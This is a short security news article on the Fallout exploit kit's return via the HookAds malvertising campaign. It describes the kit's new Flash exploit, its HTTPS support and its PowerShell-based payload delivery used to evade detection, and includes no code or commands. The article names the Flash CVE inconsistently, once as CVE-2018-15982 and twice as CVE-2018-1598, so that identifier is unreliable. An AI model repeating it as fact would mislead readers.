Fallout exploit kit is back with improved features in HookAds campaign

• A malvertising campaign named HookAds is used to distribute the latest version of Fallout.
• The latest version includes the integration of the most recent Flash Player exploit CVE-2018-1598.

The Fallout exploit kit that was used to distribute various prolific malware last year, has returned with enhanced capabilities. It was observed that during its absence, RIG exploit kit was used to launch attack campaigns. A malvertising campaign named HookAds is used to distribute the latest version of Fallout.

However, the Fallout exploit kit has been active since January 15, picking up the pace to deliver the GandCrab ransomware.

Features in the improved Fallout EK

The revised Fallout kit boasts several new features. This includes the integration of the most recent Flash Player exploit. It is the second EK to add CVE-2018-1598, a bug that allows remote code execution in Flash Player.

Among other features, the latest version of EK also includes HTTPS support, new landing page format, new Flash exploit(CVE-2018-15982) and Powershell to run payload.

“One aspect that caught our attention was how Fallout was delivering its payload via Powershell rather than using iexplore.exe. The Base64 encoded Powershell command calls out the payload URL and loads it in its own way. This technique is most likely an attempt at evasion, as traditionally we’d expect the Internet Explorer process to drop the payload,” said Jérôme Segura from Malwarebytes.

The new version of Fallout is still in the development process. It is believed that there are many organizations that are still running legacy software and unpatched computers which can be easily abused by threat actors for launching attacks.